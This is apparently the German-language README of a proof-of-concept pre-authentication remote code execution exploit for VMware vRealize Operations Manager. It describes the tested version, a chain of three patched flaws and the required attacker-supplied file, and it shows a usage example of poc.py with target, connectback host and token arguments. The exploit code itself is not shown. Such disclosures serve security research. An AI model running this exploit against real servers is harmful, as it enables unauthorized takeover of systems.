
Dies ist ein Pre-Authentication-RCE-Exploit für VMware vRealize Operations Manager
Dabei handelt es sich um einen Exploit für die vorauthentifizierte Remote-Codeausführung (RCE) in VMware vRealize Operations Manager (vROPS), der Versionen <= 8.6.3.19682901 betrifft.
Steven Seeley vom Qihoo 360 Vulnerability Research Institute
Der Exploit wurde gegen 8.6.3.19682901 getestet, und zwar mit der Datei vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00), es ist jedoch bekannt, dass er auch mit anderen älteren Versionen funktioniert.
Dieser Exploit verknüpft drei Schwachstellen, die gepatcht wurden. Weitere Details finden Sie im Blogbeitrag:
Dieser Exploit erfordert, dass der Angreifer Folgendes bereitstellt:
APUAT-8.5.0.18176777.pak.Es gibt viele bewegliche Teile in diesem Exploit. Hoffentlich habe ich ihn richtig konstruiert, sodass er auf Anhieb funktioniert.
Der Exploit benötigt im Durchschnitt ungefähr 1m34.142s, bis er abgeschlossen ist (5-mal getestet). Ich habe versucht, das schneller zu gestalten, aber es liegt innerhalb der vorgegebenen Zeit für einen Wettbewerb ;->
researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9
